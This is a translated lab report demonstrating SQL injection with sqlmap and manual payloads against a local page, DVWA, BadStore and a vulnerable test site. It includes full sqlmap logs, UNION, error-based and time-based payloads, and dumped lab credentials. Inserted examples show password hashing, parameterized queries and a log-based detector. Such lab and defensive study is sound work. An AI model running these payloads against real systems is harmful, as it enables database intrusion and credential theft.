Table of contents
1. Local attack ........ 3
   A) DB server and version ........ 3
   B) DB name ........ 5
   C) Tables ........ 6
   D) Columns ........ 7
   E) Table contents ........ 8
   F) Other databases ........ 9
   G) MySQL users ........ 10
2. DVWA ........ 12
   B) DB name ........ 19
   C) Tables ........ 20
   D) Columns ........ 21
   E) Other DBs ........ 22
4. Acunetix ........ 23
   A) DB server and version ........ 23
SQL Injection
1. Ataque Local
We are going to perform a SQL injection attack against our earlier page, the one that ran a query against our MySQL database. Its location is: http://localhost/ejerPHP/SQL_Injection/consulta.php. For this we will use the SQLMap program from the console.
A) DB server and version
First we find out the type of database server and its version; for this we use the -b option of sqlmap:
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:57:38] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[13:57:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:57:38] [INFO] target url appears to be UNION injectable with 3 columns
[13:57:38] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] Y
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
In this step the program tested each of the possibilities in turn to find out the server type:
'MySQL > 5.0.11
'PostgreSQL > 8.1
'Microsoft SQL Server
B) DB name
This is the first step towards extracting all the information we can from our victim, since from here on we will go step by step deeper into the DB. We get the name of the database that the query we made refers to, that is, the current database, with the command: --current-db
C) Tables:
Once we have the database name, we can go on to see the tables it holds, using the --tables command and passing -D asir1 with the name we obtained earlier:
D) Columns:
Database: asir1
Table: usuarios
[3 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| id       | int(10) unsigned |
| nonmbre  | varchar(50)      |
| password | varchar(50)      |
+----------+------------------+
[14:06:31] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:06:31
E) Table contents:
Database: asir1
Table: usuarios
[3 entries]
+----+---------+----------+
| id | nonmbre | password |
+----+---------+----------+
| 2  | ivan    | ivanasir |
| 3  | luci    | luciasir |
| 1  | root    | asir2012 |
+----+---------+----------+

Now we have the complete usuarios table of the asir1 database.
Iván Martín Valderas
F) Other databases:
available databases [8]:
[*] asir1
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth
G) MySQL users:
database management system users [4]:
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
There is only one root user. Here is one of the problems: we are using the root user that MySQL ships with by default to connect from PHP. If we are using the root user for our SQL statements, that means we can make calls to the system:
2. DVWA
Installation
Default username = admin
Default password = password
1' or '1'='1' union select password, first_name from users where first_name='admin
ID: 1' or '1'='1' union select password, first_name from users where first_name='admin
First name: 5f4dcc3b5aa765d61d8327deb882cf99
Surname: admin
http://es.scribd.com/doc/48652427/Practica-SQL-Injection-en-DVWA
We have obtained a password, although as we can see it is encoded; we will use a web utility to decode it:
Let's try to extract all the passwords at once, since with the previous code we would have to do it one by one:
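Why a web utility can "decode" the value above: it is an unsalted MD5 digest, so the same password always produces the same digest and a precomputed table maps it straight back. The following is an added example (not from this report or from DVWA) that reproduces the lookup against a small constructed wordlist and shows the storage format that defeats it: a random per-user salt with a slow key derivation function (PBKDF2-HMAC-SHA256 from Python's standard library). The wordlist and the `pbkdf2_hash` storage string format are this example's own choices.

```python
import hashlib
import hmac
import os

# The hash dumped from DVWA above: unsalted MD5 of a common word.
LEAKED_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"

# Constructed mini wordlist; online "decoders" hold a much larger
# precomputed version of exactly this table.
WORDLIST = ["123456", "letmein", "password", "admin"]


def md5_lookup(digest, wordlist):
    """The lookup the web utility performs: hash each candidate and compare.
    Works because MD5 is fast, unsalted and deterministic."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def pbkdf2_hash(password, salt=None, iterations=600_000):
    """Storage that resists the lookup: a 16-byte random salt per user and a
    deliberately slow KDF. The same password yields a different stored
    value each time, so no shared table can be built."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and iteration count, then compare in
    constant time so response timing leaks nothing about the digest."""
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("MD5 lookup recovers:", md5_lookup(LEAKED_HASH, WORDLIST))
    stored = pbkdf2_hash("password")
    print("PBKDF2 record     :", stored)
    print("verify correct    :", pbkdf2_verify("password", stored))
    print("verify wrong      :", pbkdf2_verify("passw0rd", stored))
    print("second record differs:", pbkdf2_hash("password") != stored)
```

The salt and iteration count are stored next to the digest on purpose: they are not secrets, they only force the attacker to redo the slow computation separately for every user instead of once for the whole dump.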
1' or '1'='1' union select first_name, password from users where '1'='1
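The reason the text typed into the ID field is able to append a UNION is that the page pastes it straight into the SQL string. The following added example (not code from this report or from DVWA) shows that lookup written both ways and runs the payload quoted above against each. It uses an in-memory SQLite database as a stand-in for MySQL, with constructed sample rows; the query shape `SELECT first_name, last_name FROM users WHERE user_id = '...'` is assumed to match DVWA's. The comment at the end returns to the point made in section 1.G about the application connecting as root: the `webapp` account there is hypothetical.

```python
import hashlib
import sqlite3

# Constructed sample rows standing in for DVWA's `users` table; the
# password column holds unsalted MD5 digests, as in the dump above.
SAMPLE_USERS = [
    (1, "admin", "admin", hashlib.md5(b"password").hexdigest()),
    (2, "Gordon", "Brown", hashlib.md5(b"abc123").hexdigest()),
]

# The payload entered in DVWA's ID field above, verbatim.
PAYLOAD = "1' or '1'='1' union select first_name, password from users where '1'='1"


def make_db():
    """In-memory SQLite database (stand-in for MySQL) with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Assumed shape of the DVWA low-security query: the submitted text is
    concatenated into the SQL, so a quote in it ends the literal and the
    rest is parsed as SQL. Returns every row the attacker selects."""
    sql = ("SELECT first_name, last_name FROM users WHERE user_id = '"
           + user_id + "'")
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, user_id):
    """Same query with a bound parameter: the value travels separately from
    the statement text and can only be compared, never parsed."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


# Second half of the problem noted in section 1.G: the page connects as
# MySQL's root. A dedicated account with only the rights the page needs
# limits what any remaining injection can reach. Hypothetical account name,
# real MySQL syntax:
#
#   CREATE USER 'webapp'@'localhost' IDENTIFIED BY '<strong-password>';
#   GRANT SELECT ON asir1.usuarios TO 'webapp'@'localhost';
#
# No FILE privilege, no access to other schemas, no write access unless the
# page actually performs writes.

if __name__ == "__main__":
    db = make_db()
    print("normal lookup :", lookup_hardened(db, "1"))
    print("concatenated  :", lookup_vulnerable(db, PAYLOAD))  # leaks every hash
    print("parameterized :", lookup_hardened(db, PAYLOAD))    # no rows
```

With the concatenated version the payload returns the real rows plus one row per user carrying the password hash; with the bound parameter the whole payload string is compared against `user_id` as a value, matches nothing, and the statement structure is unchanged.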
3. BadStore
If we type a double quote (") in the search field we get an error response from the SQL server, so we can anticipate the SQL vulnerability.
A) DB server and version
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:02:41

[10:02:41] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:02:41] [INFO] testing connection to the target url
[10:02:41] [INFO] testing if the url is stable, wait a few seconds
[10:02:42] [INFO] url is stable
[10:02:42] [INFO] testing if GET parameter 'searchquery' is dynamic
[10:02:43] [WARNING] GET parameter 'searchquery' is not dynamic
[10:02:43] [INFO] heuristic test shows that GET parameter 'searchquery' might be injectable (possible DBMS: MySQL)
[10:02:43] [INFO] testing sql injection on GET parameter 'searchquery'
[10:02:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:02:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:02:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:02:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[10:02:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:02:57] [INFO] target url appears to be UNION injectable with 4 columns
[10:02:57] [INFO] GET parameter 'searchquery' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'searchquery' is vulnerable. Do you want to keep testing the others? [y/N] y

Here it has warned us that the searchquery parameter is vulnerable, that is, the search box where we inserted the double quote (") earlier is sent as a GET parameter that will let us insert SQL statements there; it also asks whether we want to look for other vulnerable parameters.
[10:03:05] [INFO] testing if GET parameter 'action' is dynamic
[10:03:05] [INFO] confirming that GET parameter 'action' is dynamic
[10:03:05] [INFO] GET parameter 'action' is dynamic
[10:03:05] [WARNING] heuristic test shows that GET parameter 'action' might not be injectable
[10:03:05] [INFO] testing sql injection on GET parameter 'action'
[10:03:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:17] [WARNING] GET parameter 'action' is not injectable
[10:03:17] [INFO] testing if GET parameter 'x' is dynamic
[10:03:17] [WARNING] GET parameter 'x' is not dynamic
[10:03:17] [WARNING] heuristic test shows that GET parameter 'x' might not be injectable
[10:03:17] [INFO] testing sql injection on GET parameter 'x'
[10:03:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:31] [WARNING] GET parameter 'x' is not injectable
[10:03:31] [INFO] testing if GET parameter 'y' is dynamic
[10:03:31] [WARNING] GET parameter 'y' is not dynamic
[10:03:31] [WARNING] heuristic test shows that GET parameter 'y' might not be injectable
[10:03:31] [INFO] testing sql injection on GET parameter 'y'
[10:03:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:44] [WARNING] GET parameter 'y' is not injectable
sqlmap identified the following injection points with a total of 380 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---

[10:03:45] [INFO] testing MySQL
[10:03:45] [INFO] confirming MySQL
[10:03:45] [INFO] the back-end DBMS is MySQL
[10:03:45] [INFO] fetching banner
web application technology: Apache 1.3.28
B) DB name
The DB name is badstoredb.
C) Tables
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --tables -D badstoredb

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:20:13

[10:20:13] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:20:13] [INFO] resuming injection data from session file
[10:20:13] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:20:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---

[10:20:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:20:14] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
do you want to use common table existance check? [Y/n/q] y
[10:20:21] [INFO] checking table existence using items from 'C:\sqlmap-0.9\sqlmap\txt\common-tables.txt'
[10:20:21] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)]
[10:20:28] [WARNING] running in a single-thread mode. This could take a while.
[10:27:14] [INFO] retrieved: itemdb
D) Columns
Database: badstoredb
Table: itemdb
[2 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| price  | numeric |
| qty    | numeric |
+--------+---------+

[10:34:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'
E) Other DBs
As we have seen, there is no table called usuarios or anything like it; only the products table is present, so this way we cannot get users or passwords. Let's check the other databases, then:
4. Acunetix
We enter the site and, browsing around it, in the categories section we see that the URL shows ?cat=1, which is a hint worth checking: http://testphp.vulnweb.com/listproducts.php?cat=1
ble (possible DBMS: MySQL)
[10:52:51] [INFO] testing sql injection on GET parameter 'cat'
[10:52:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:52:52] [INFO] GET parameter 'cat' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[10:52:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:52:52] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[10:52:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:52:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:53:52] [INFO] GET parameter 'cat' is 'MySQL > 5.0.11 AND time-based blind' injectable
[10:53:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:53:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'cat' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[10:54:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0

[10:54:07] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com'

[*] shutting down at: 10:54:07
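The three payload families sqlmap reported here (boolean-based, error-based, time-based) plus the UNION payloads from the earlier sessions all pass through the web server's access log, which is where a defender sees them. The following is an added example (not part of this report and not sqlmap's code) of a small detector that parses Apache combined-format lines, URL-decodes each request and tags the families present. The log lines are constructed for this example, with the request strings taken from the payloads quoted in this document (the BadStore one abridged); the family names and regexes are this example's own, and the tool User-Agent check relies on sqlmap's default banner as shown in its own output above.

```python
import re
from urllib.parse import unquote_plus

# One regex per payload family reported in the sqlmap sessions above.
PATTERNS = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "union-based": re.compile(r"\bUNION(\s+ALL)?\s+SELECT\b", re.I),
    "tautology": re.compile(r"'\s*or\s+'1'\s*=\s*'1", re.I),
    "schema enumeration": re.compile(r"\binformation_schema\b", re.I),
}
SQLMAP_UA = re.compile(r"\bsqlmap\b", re.I)

# Apache/NCSA combined log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed log lines; the query strings are the payloads quoted in this
# document, URL-encoded the way a server records them.
SAMPLE_LOG = """\
192.168.13.1 - - [10/Mar/2012:10:52:51 +0100] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.13.1 - - [10/Mar/2012:10:52:52 +0100] "GET /listproducts.php?cat=1%20AND%204423%3D4423 HTTP/1.1" 200 5123 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
192.168.13.1 - - [10/Mar/2012:10:53:52 +0100] "GET /listproducts.php?cat=1%20AND%20SLEEP(5) HTTP/1.1" 200 5123 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
192.168.13.1 - - [10/Mar/2012:10:54:07 +0100] "GET /listproducts.php?cat=1%20AND%20(SELECT%20997%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT%20(CASE%20WHEN%20(997%3D997)%20THEN%201%20ELSE%200%20END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 200 5123 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
192.168.13.1 - - [10/Mar/2012:10:03:44 +0100] "GET /cgi-bin/badstore.cgi?searchquery=hi%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(CHAR(58,118,116,114,58))%23&action=search&x=0&y=0 HTTP/1.0" 200 2048 "-" "Mozilla/5.0"
192.168.13.1 - - [10/Mar/2012:11:10:00 +0100] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20or%20%271%27%3D%271%27%20union%20select%20first_name,%20password%20from%20users%20where%20%271%27%3D%271&Submit=Submit HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""


def classify(request_path):
    """Return the payload families found in one URL-encoded request path."""
    decoded = unquote_plus(request_path)
    return [name for name, rx in PATTERNS.items() if rx.search(decoded)]


def scan(log_text):
    """Parse combined-format lines and report those carrying a payload or a
    sqlmap User-Agent. Hand-typed payloads (browser UA) are still caught."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        families = classify(m["path"])
        tool_ua = bool(SQLMAP_UA.search(m["ua"]))
        if families or tool_ua:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"],
                           "families": families, "sqlmap_ua": tool_ua})
    return alerts


def by_source(alerts):
    """Hits per client address. A burst from one address is the automated
    signature (29 requests in the session above, 380 against BadStore)."""
    counts = {}
    for a in alerts:
        counts[a["ip"]] = counts.get(a["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        flag = "sqlmap UA" if a["sqlmap_ua"] else "browser UA"
        print(a["ip"], a["families"], flag, a["path"][:60])
    print(by_source(found))
```

The benign first line produces no alert; the five others are tagged by family, and the last two show that the detector does not depend on the User-Agent, which an operator can change freely. Decoding before matching matters: the `%27` and `%3D` in the raw lines would otherwise hide the quotes and equals signs the patterns look for.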
B) DB name
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:52:15

[11:52:15] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:52:15] [INFO] resuming injection data from session file
[11:52:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:52:15] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[11:52:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:52:16] [INFO] fetching current database
C) Tables
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables -D acuart

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:54:12

[11:54:12] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:54:12] [INFO] resuming injection data from session file
[11:54:12] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:54:12] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[11:54:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:54:14] [INFO] fetching tables for database 'acuart'
[11:54:14] [INFO] the SQL query used returns 7 entries
[11:54:15] [INFO] retrieved: acuart
[11:54:15] [INFO] retrieved: artists
[11:54:15] [INFO] retrieved: acuart
[11:54:15] [INFO] retrieved: carts
[11:54:16] [INFO] retrieved: acuart
[11:54:16] [INFO] retrieved: categ
[11:54:16] [INFO] retrieved: acuart
[11:54:16] [INFO] retrieved: featured
[11:54:17] [INFO] retrieved: acuart
[11:54:17] [INFO] retrieved: guestbook
[11:54:17] [INFO] retrieved: acuart
[11:54:17] [INFO] retrieved: pictures
[11:54:18] [INFO] retrieved: acuart
[11:54:18] [INFO] retrieved: users
Database: acuart
[7 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| users     |
+-----------+
D) Columns
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --columns -T users -D acuart

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:56:55

[11:56:55] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:56:55] [INFO] resuming injection data from session file
[11:56:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:56:55] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[11:56:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:56:56] [INFO] fetching columns for table 'users' on database 'acuart'
[11:56:56] [INFO] the SQL query used returns 8 entries
[11:56:56] [INFO] retrieved: uname
[11:56:56] [INFO] retrieved: varchar(100)
[11:56:57] [INFO] retrieved: pass
[11:56:57] [INFO] retrieved: varchar(100)
[11:56:57] [INFO] retrieved: cc
[11:56:58] [INFO] retrieved: varchar(100)
[11:56:58] [INFO] retrieved: address
[11:56:58] [INFO] retrieved: mediumtext
[11:56:58] [INFO] retrieved: email
[11:56:58] [INFO] retrieved: varchar(100)
[11:56:58] [INFO] retrieved: name
[11:56:59] [INFO] retrieved: varchar(100)
[11:56:59] [INFO] retrieved: phone
[11:56:59] [INFO] retrieved: varchar(100)
[11:56:59] [INFO] retrieved: cart
[11:56:59] [INFO] retrieved: varchar(100)
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+